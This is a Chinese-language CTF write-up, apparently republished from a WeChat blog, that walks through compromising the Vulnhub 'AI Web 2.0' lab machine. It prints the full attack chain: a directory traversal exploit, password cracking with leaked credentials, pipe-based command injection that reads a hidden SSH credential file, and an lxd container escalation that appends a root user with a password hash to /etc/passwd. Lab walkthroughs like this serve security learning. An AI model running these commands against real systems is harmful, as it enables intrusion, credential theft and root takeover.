【Vulnhub】AI Web 2.0

nmap -A -p- 192.168.149.178

访问页面啥也没有

发现有一个上传的地方被注释掉了,抓包的时候改掉它,得到一个上传点,但是不知道路径

扫目录,扫出来一个 download.php,然后去试了试上面导航栏的名字,viewing.php 也可以访问,deleting.php 会跳转回来(可能是删完了跳回来了?)

https://www.exploit-db.com/exploits/40009

这里有个目录遍历,使用 file_name 参数,看一下 apache 的认证文件

靶机介绍说用这个字典来爆破密码

https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou-45.txt

瞬间出结果 aiweb2admin:c.ronaldo

然后用 dirsearch 扫出来 webadmin(嗯,我以后还是直接用 dirsearch 把)

访问 http://192.168.149.178/webadmin/ 用刚刚爆破出来的密码登录进去

又提示了 robots,去访问一下

Disallow: /H05Tpin9555/

Disallow: /S0mextras/

挨个访问,第一个有一个命令执行,用 | 可以绕过

使用

127.0.0.1|find . -type f /var/www/html/webadmin/S0mextras/

看一下有没有什么隐藏的文件

127.0.0.1|cat /var/www/html/webadmin/S0mextras/.sshUserCred55512.txt 

拿到 ssh 账号密码

User: n0nr00tuser

Cred: zxowieoi4sdsadpEClDws1sf

ssh 连上看看

用一下 LinEnum 试试,一直看一些 wp 用还没用过

git clone https://github.com/rebootuser/LinEnum 

然后进去给 LinEnum.sh 权限,运行就可以

当前用户 n0nr00tuser 是属于 lxd 的用户组成员

LXD和LXC Linux Container(LXC)通常被认为是一种轻量级虚拟化技术,它介于Chroot和完整开发的虚拟机之间,LXC可以创建一个跟正常Linux操作系统十分接近的环境,但是不需要使用到单独的内核资源 Linux Daemon(LXD)是一个轻量级容器管理程序,而LXD是基于LXC容器技术实现的,而这种技术之前Docker也使用过。LXD使用了稳定的LXC API来完成所有的后台容器管理工作,并且增加了REST API支持,更进一步地提升了用户体验度 https://www.freebuf.com/articles/system/216803.html

依次执行这些语句

lxc start UbuntuMini
lxc config set UbuntuMini security.privileged true
lxc config set UbuntuMini security.nesting true
lxc config device add UbuntuMini sharetesting disk source=/etc path=/sharingiscaring

然后,复制 /etc/passwd 到当前目录 passwd,然后把这一句加进去

echo 'hack:$1$hack$gP1TCDm4c1ABbBzR6fMid1:0:0::/root:/bin/bash' >> passwd

这里添加了一个有 root 权限的用户:hack,密码是:yichen

可以用这条命令生成 hash

openssl passwd -1 -salt hack yichen

然后把 passwd 传到容器里面

lxc file push passwd UbuntuMini/sharingiscaring/passwd

如果显示没有权限可以用

python -c "import pty;pty.spawn('/bin/bash')"

开一个 bash 的 shell

本文分享自微信公众号 - 陈冠男的游戏人生(CGN-115),作者:yichen

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-07-20

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 【Vulnhub】DC-9

    在 web 的 search 界面找到一存在 sql 注入的页面,然后 sqlmap 跑出来 admin:transorbital1

    yichen
  • 【Vulnhub】five86-2

    wpscan --url http://five86-2 -P passwords.txt -U users.txt 来爆破一下用户名和密码

    yichen
  • 逆向一期/009/万能断点找注册码

    等到万事俱备,只差点注册的时候,回到 OD,给万能断点下断,因为这叫万能断点,所以什么也断,如果不是等点注册,会一直断掉程序

    yichen
  • 离开互联网大厂的年轻人都去了哪儿?| DT数说

    这是Celine在腾讯的第5年。从入职的那天起,这份工作几乎满足了她对于“完美工作”的所有定义。“大平台、高起点、匹配一线城市房价的高收入……”,Celine毫...

    材ccc
  • SAP最佳业务实践:FI–应收帐款(157)-8 F-31付款退款–手动

    4.9 F-31付款退款 – 手动 您可手动或自动过帐付款(付款程序 SAPF110 – 参见上一步)。 手动过帐过程如下所述。特别是在手动付款或手动分步过帐帐...

    SAP最佳业务实践
  • Sony-PMCA-RE, 反向工程索尼PlayMemories相机应用

    最新的索尼相机包括一个Android子系统,用于运行专有的相机App Store (PMCA )的应用,此存储库中提供的工具允许你在相机上安装自己的Androi...

    云深无际
  • 高并发架构技术|缓存失效、缓存穿透问题 PHP 代码解决

    缓存失效:   引起这个原因的主要因素是高并发下,我们一般设定一个缓存的过期时间时,可能有一些会设置5分钟啊,10分钟这些;并发很高时可能会出在某一个时间同时...

    猿哥
  • Spring使用外部属性文件以及常见错误(内附大量图片,很有借鉴意义)

    版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/sinat_35512245/articl...

    大黄大黄大黄
  • go:优雅的退出http服务

    此外,server.ListenAndServe()不能跑在main中,因为在main中,要处理其它任务。如何使main阻塞呢?上段代码done这个协程是能派上...

    超级大猪
  • JeecgBoot项目上线发布的几种方式

    部署方案采用nginx+tomcat部署方案 后端服务通过JAR方式运行 前端项目build后的静态资源,部署到nginx中

    魏晓蕾

扫码关注云+社区

领取腾讯云代金券